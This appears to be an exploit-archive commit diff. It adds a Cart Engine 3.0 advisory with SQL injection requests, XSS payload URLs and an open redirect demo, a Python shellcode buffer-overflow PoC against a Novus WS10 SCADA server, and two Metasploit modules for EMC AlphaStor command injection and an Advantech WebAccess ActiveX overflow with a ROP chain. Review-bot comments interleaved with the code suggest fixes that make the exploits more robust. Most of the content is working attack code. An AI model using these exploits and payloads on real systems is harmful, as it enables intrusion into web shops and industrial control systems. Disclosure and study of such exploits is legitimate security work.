https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
15/09/2014 - Fix released publicly in Osclass 3.4.2
Credits & Authors
-----------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner.
About Netsparker
----------------
Netsparker can find and report security issues and vulnerabilities
such as SQL Injection and Cross-site Scripting (XSS) in all websites
and web applications regardless of the platform and the technology
they are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information on Netsparker visit
https://www.netsparker.com.

249
platforms/php/webapps/34764.txt Executable file

@ -0,0 +1,249 @@
=== Details ===
Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/
Affected Product: Cart Engine
Version: 3.0
=== Executive Summary ===
SQL Injection: Using a specially crafted HTTP request, it is possible to exploit
a lack in the validation[1] of the “item_id[0]” and “item_id[]” input parameters
of cart.php page. Successful exploitation of the vulnerabilities results in read
sensitive data from the database and, in some cases, execute administration
operation on the database or issue commands to the operating system.
Reflected XSS: Using a specially crafted HTTP request, it is possible to exploit
a lack in the neutralization[2] of multiple pages output which includes the user
submitted content. Successful exploitation of the vulnerabilities, results in
the execution of arbitrary HTML and script code in the users browser in the context of
the victim user's session trough a “Reflected XSS”.
Open Redirect: Using a specially crafted HTTP request, it is possible to
redirect[3] the normal browsing of users to a malicious site by modifying
untrusted URL input in Referer HTTP header parameter in index.php, cart.php,
msg.php and page.php pages. Successful exploitation of the vulnerabilities
results in phishing scam, user credential theft, malware dissemination.
=== Proof of Concept ===
= SQL Injection (based on MySQL) =
A SQL Injection vulnerability has been detected on cart.php page in Cart Engine
CMS. The function “sql_query” in file “cart.php” doesnt sanitize the “$item_id”
parameter, so error based and boolean-based blind or time-based blind SQL
Injection attacks can be executed.
## HTTP REQUEST - injection on item_id[0] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=8
Cookie: PHPSESSID=iost0tdmvdobp966rbppa514f3; ce3_history[0]=12; ce3_history[1]=8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------109606523931762158449252347
Content-Length: 774
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="AXSRF_token"
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="cmd"
add
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="item_id[0]"
8' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT user()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------109606523931762158449252347
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------109606523931762158449252347--
## EOF HTTP REQUEST ##
## HTTP REQUEST - injection on item_id[] parameter ##
POST /cart.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eshop.hacme.hac/detail.php?item_id=13
Cookie: PHPSESSID=aci236dihehpjaldchbt6k6v23; ce3_history[0]=24; ce3_history[1]=13
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1948855485207142787318084006
Content-Length: 2353
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="AXSRF_token"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="cmd"
add
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[0]"
13
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[0]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_3"
3
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="prod_opt_12"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
' AND (SELECT 22 FROM (SELECT COUNT(*), CONCAT(0x3a,0x3a,(SELECT database()),0x3a,0x3a,FLOOR(RAND()*2))a FROM INFORMATION_SCHEMA.columns GROUP BY a)b) AND 'ql'='ql
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="item_id[]"
-----------------------------1948855485207142787318084006
Content-Disposition: form-data; name="qty[]"
1
-----------------------------1948855485207142787318084006--
## EOF HTTP REQUEST ##
= Reflected XSS =
A Reflected XSS vulnerability has been detected on multiple pages in Cart Engine
CMS. In the file "skins/default/outline.tpl", the parameter "path" in section
"drop down TOP menu (with path)" and the parameter "$print_this_page" in section
"footer_content_block" are not sanitized, so an XSS attack can be executed on
multiple pages.
## HTTP REQUESTS ##
/index.php?"><script>alert('XSS')<%2fscript>
/index.php?'%3balert('XSS')%2f%2f
/checkout.php?%27%3balert%28%27XSS%27%29%2f%2f
/checkout.php?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
/contact.php?"><script>alert('XSS')<%2fscript>
/contact.php?'%3balert('XSS')%2f%2f
/detail.php?item_id=10&'%3balert('XSS')%2f%2f
/detail.php?item_id=10&"><script>alert('XSS')<%2fscript>
/distro.php?'%3balert('XSS')%2f%2f
/distro.php?"><script>alert('XSS')<%2fscript>
/newsletter.php?'%3balert('XSS')%2f%2f
/newsletter.php?"><script>alert('XSS')<%2fscript>
/page.php?pid=2&"><script>alert('XSS')<%2fscript>
/page.php?pid=2&'%3balert('XSS')%2f%2f
/profile.php?"><script>alert('XSS')<%2fscript>
/profile.php?'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&'%3balert('XSS')%2f%2f
/search.php?mod_id=_shop&cmd=list&cat_id=1&"><script>alert('XSS')<%2fscript>
/sitemap.php?'%3balert('XSS')%2f%2f
/sitemap.php?"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&"><script>alert('XSS')<%2fscript>
/task.php?mod=qcomment&m=gbook&i=1&t=cy9NLS5Jys%2FPBgA%3D&'%3balert('XSS')%2f%2f
/tell.php?'%3balert('XSS')%2f%2f
/tell.php?"><script>alert('XSS')<%2fscript>
## EOF HTTP REQUEST ##
= Open Redirect =
An Open Redirect vulnerability has been detected on multiple pages in Cart
Engine CMS. The function "redir" in file "includes/function.php" doesn't check
the "$_SERVER['HTTP_REFERER']" parameter, so an Open Redirect attack can be
executed.
## HTTP REQUEST ##
GET /page.php HTTP/1.1
Host: eshop.hacme.hac
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=
Cookie: PHPSESSID=rtg5ooetpj7resie416iu9b2s6
Connection: close
$ cat openredirect.req | nc -vvv eshop.hacme.hac 80
hacme.hac [10.0.2.80] 80 (http) open
HTTP/1.1 302 Found
Date: Sun, 10 Aug 2014 15:16:34 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?hl=en&q=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
sent 403, rcvd 380
=== Solution ===
Upgrade to Cart Engine 4.0.
=== Disclosure Timeline ===
2014-08-08 Vulnerability Discovered
2014-08-10 Initial vendor notification
2014-08-20 The vendor fixed the vulnerability
2014-09-15 Public advisory
=== References ===
[1] https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
[2] https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
[3] https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

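--- a/platforms/windows/dos/34752.c
+++ b/platforms/windows/dos/34752.c
@@ -0,0 +1,49 @@
+## Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC
+## Date: 09/23/2014
+## Author: Pedro Sánchez
+## Version: 1.83 (English)
+## Tested on: Windows 7 embedded.
+## Notified the vendor, vendor never responded.
+## In the new version this PoC stops working
+## Vendor: Novus
+## http://www.novus.com.br
+## NOVUS Electronics is a manufacturer of instruments for control, data acquisition and supervisory systems, mainly for factory automation
+import os
+import socket
+import sys
+## The process listens on TCP port 2001
+host = sys.argv[1]
+port = int(sys.argv[2])
+print " PoC WS10 Data Server SCADA Exploit "
+print " Pedro Sanchez "
+shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90")
+## Exploit contructor
+ws10 = ("\x90" * 1024 + "\x44" * 31788)
+ws10 += ("\xeb\x14")
+ws10 += ("\x44" * 6)
+ws10 += ("\xad\xbb\xc3\x77")
+ws10 += ("\xb4\x73\xed\x77")
+ws10 += ("\x90" * 21)
+ws10 += shellcode
+print " [+] Sending payload..."
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host,port))
+s.send(ws10)
+data = s.recv(1024)
+print " [+] Closing..."
+s.close()
+print " [+] Done!"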
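Review bot: The file is committed as `platforms/windows/dos/34752.c` but its content is a Python 2 script (`import socket`, `print " PoC ..."` statements, a `str` byte buffer), so the `.c` extension misdescribes it to the index, to syntax highlighting and to anyone who tries to build it; a `.py` name would match the content. The script also reads `sys.argv[1]` and `sys.argv[2]` with no length check, so running it without arguments ends in an `IndexError` rather than a usage line; `if len(sys.argv) != 3: sys.exit("usage: <script> <host> <port>")` before the assignments would cover that. `import os` is unused and can go.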

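--- a/platforms/windows/remote/34756.rb
+++ b/platforms/windows/remote/34756.rb
@@ -0,0 +1,121 @@
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::CmdStager
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
+'Description' => %q{
+This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
+command, the process does not properly filter user supplied input allowing for arbitrary
+command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
+with Windows 2003 SP2 and Windows 2008 R2.
+},
+'Author' =>
+[
+'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
+'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
+'Mohsan Farid <faridms[at]gmail.com>', # msf module
+'Brent Morris <inkrypto[at]gmail.com>', # msf module
+'juan vazquez' # convert aux module into exploit
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['CVE', '2013-0928'],
+['ZDI', '13-033']
+],
+'Platform' => 'win',
+'Arch' => ARCH_X86,
+'Payload' =>
+{
+'Space' => 2048,
+'DisableNops' => true
+},
+'Targets' =>
+[
+[ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
+],
+'CmdStagerFlavor' => 'vbs',
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Jan 18 2013'))
+register_options(
+[
+Opt::RPORT(3000)
+], self.class )
+end
+def check
+packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
+res = send_packet(packet)
+if res && res =~ /Could not fork command/
+return Exploit::CheckCode::Detected
+end
+Exploit::CheckCode::Unknown
+end
+def exploit
+execute_cmdstager({ :linemax => 487 })
+end
+def execute_command(cmd, opts)
+padding = rand_text_alpha_upper(489 - cmd.length)
+packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
+connect
+sock.put(packet)
+begin
+sock.get_once
+rescue EOFError
+fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
+end
+disconnect
+end
+def execute_cmdstager_begin(opts)
+if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
+cmd_list.each do |cmd|
+cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
+end
+end
+end
+def send_packet(packet)
+connect
+sock.put(packet)
+begin
+meta_data = sock.get_once(8)
+rescue EOFError
+meta_data = nil
+end
+unless meta_data
+disconnect
+return nil
+end
+code, length = meta_data.unpack("N*")
+unless code == 1
+disconnect
+return nil
+end
+begin
+data = sock.get_once(length)
+rescue EOFError
+data = nil
+ensure
+disconnect
+end
+data
+end
+end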
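Review bot: The packet line in `execute_command` ends with a leftover fragment, `# #{padding}"`, after the closing quote; Ruby treats it as a comment so it is harmless at runtime, but it reads like a half-finished edit and should be dropped: `packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"`. In `send_packet`, `meta_data.unpack("N*")` assumes `get_once(8)` returned all 8 bytes, and `length` is then handed unchecked to `sock.get_once(length)`, so a short header leaves `length` nil and a broken or hostile peer can dictate the read size; `return nil unless meta_data && meta_data.bytesize == 8` before the unpack, plus a sanity cap on `length`, would close both. `check` is not passive — it sends an opcode 0x75 packet carrying `mminfo & <random>` to the Device Manager — which is worth stating in the module description, since a `check` run alone already triggers a command-fork attempt on the service.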

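--- a/platforms/windows/remote/34757.rb
+++ b/platforms/windows/remote/34757.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::BrowserExploitServer
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
+'Description' => %q{
+This module exploits a buffer overflow vulnerability in Advantec WebAccess. The
+vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
+sprintf can be reached with user controlled data through the GetColor function.
+This module has been tested successfully on Windows XP SP3 with IE6 and Windows
+7 SP1 with IE8 and IE 9.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Unknown', # Vulnerability discovery
+'juan vazquez' # Metasploit module
+],
+'References' =>
+[
+['CVE', '2014-2364'],
+['ZDI', '14-255'],
+['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
+],
+'DefaultOptions' =>
+{
+'Retries' => false,
+'InitialAutoRunScript' => 'migrate -f'
+},
+'BrowserRequirements' =>
+{
+:source => /script|headers/i,
+:os_name => Msf::OperatingSystems::WINDOWS,
+:ua_name => /MSIE/i,
+:ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
+:clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
+:method => "GetColor"
+},
+'Payload' =>
+{
+'Space' => 1024,
+'DisableNops' => true,
+'BadChars' => "\x00\x0a\x0d\x5c",
+# Patch the stack to execute the decoder...
+'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
+# Fix the stack again, this time better :), before the payload
+# is executed.
+'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+"\x83\xC0\x08" + # add eax, byte 8
+"\x8b\x20" + # mov esp, [eax]
+"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
+},
+'Platform' => 'win',
+'Arch' => ARCH_X86,
+'Targets' =>
+[
+[ 'Automatic', { } ]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Jul 17 2014'))
+end
+def on_request_exploit(cli, request, target_info)
+print_status("Requested: #{request.uri}")
+content = <<-EOS
+<html>
+<head>
+<meta http-equiv="cache-control" content="max-age=0" />
+<meta http-equiv="cache-control" content="no-cache" />
+<meta http-equiv="expires" content="0" />
+<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
+<meta http-equiv="pragma" content="no-cache" />
+</head>
+<body>
+<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
+<script language='javascript'>
+test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
+</script>
+</body>
+</html>
+EOS
+print_status("Sending #{self.name}")
+send_response_html(cli, content, {'Pragma' => 'no-cache'})
+end
+# Uses gadgets from ijl11.dll 1.1.2.16
+def rop_payload(code)
+xpl = rand_text_alphanumeric(61) # offset
+xpl << [0x60014185].pack("V") # RET
+xpl << rand_text_alphanumeric(8)
+# EBX = dwSize (0x40)
+xpl << [0x60012288].pack("V") # POP ECX # RETN
+xpl << [0xffffffff].pack("V") # ecx value
+xpl << [0x6002157e].pack("V") # POP EAX # RETN
+xpl << [0x9ffdafc9].pack("V") # eax value
+xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
+xpl << [0x60018084].pack("V") # POP EBP # RETN
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+xpl << [0x60012288].pack("V") # POP ECX # RETN
+xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
+xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
+# EDX = flAllocationType (0x1000)
+xpl << [0x60012288].pack("V") # POP ECX # RETN
+xpl << [0xffffffff].pack("V") # ecx value
+xpl << [0x6002157e].pack("V") # POP EAX # RETN
+xpl << [0x9ffdbf89].pack("V") # eax value
+xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
+xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
+# ECX = flProtect (0x40)
+xpl << [0x6002157e].pack("V") # POP EAX # RETN
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << rand_text_alphanumeric(4) # padding
+xpl << [0x60029f6c].pack("V") # .data ijl11.dll
+xpl << [0x60012288].pack("V") # POP ECX # RETN
+xpl << [0xffffffff].pack("V") # ecx value
+0x41.times do
+xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
+end
+# EAX = ptr to &VirtualAlloc()
+xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
+xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]
+# EBP = POP (skip 4 bytes)
+xpl << [0x6002054b].pack("V") # POP EBP # RETN
+xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)
+# ESI = ptr to JMP [EAX]
+xpl << [0x600181cc].pack("V") # POP ESI # RETN
+xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])
+# EDI = ROP NOP (RETN)
+xpl << [0x60021ad1].pack("V") # POP EDI # RETN
+xpl << [0x60021ad2].pack("V") # ptr to &(retn)
+# ESP = lpAddress (automatic)
+# PUSHAD # RETN
+xpl << [0x60018399].pack("V") # PUSHAD # RETN
+xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)
+xpl << code
+xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
+xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping
+xpl
+end
+end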
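Review bot: The two `gsub!` calls at the end of `rop_payload` do not do what their comments say: escaping `"` before `\` would turn every `\"` just produced into `\\"` and end the JavaScript string literal early, and the second call is a no-op because a Ruby replacement string interprets backslash sequences, so the two-character `"\\\\"` yields a single backslash and rewrites `\` to `\`. The module only works because `\x5c` is listed in `BadChars` and none of the packed gadget addresses contain that byte, while `0x60012288` does pack a `"` byte, so only the first pass ever fires; that is a fragile accident rather than a guarantee. Backslashes should be escaped first and the block form used to bypass replacement-string interpretation: `xpl.gsub!("\\") { "\\\\" }` then `xpl.gsub!("\"") { "\\\"" }`. A one-line comment noting that `BadChars` keeps `\x5c` out of the payload would also explain why the backslash pass is expected to be idle.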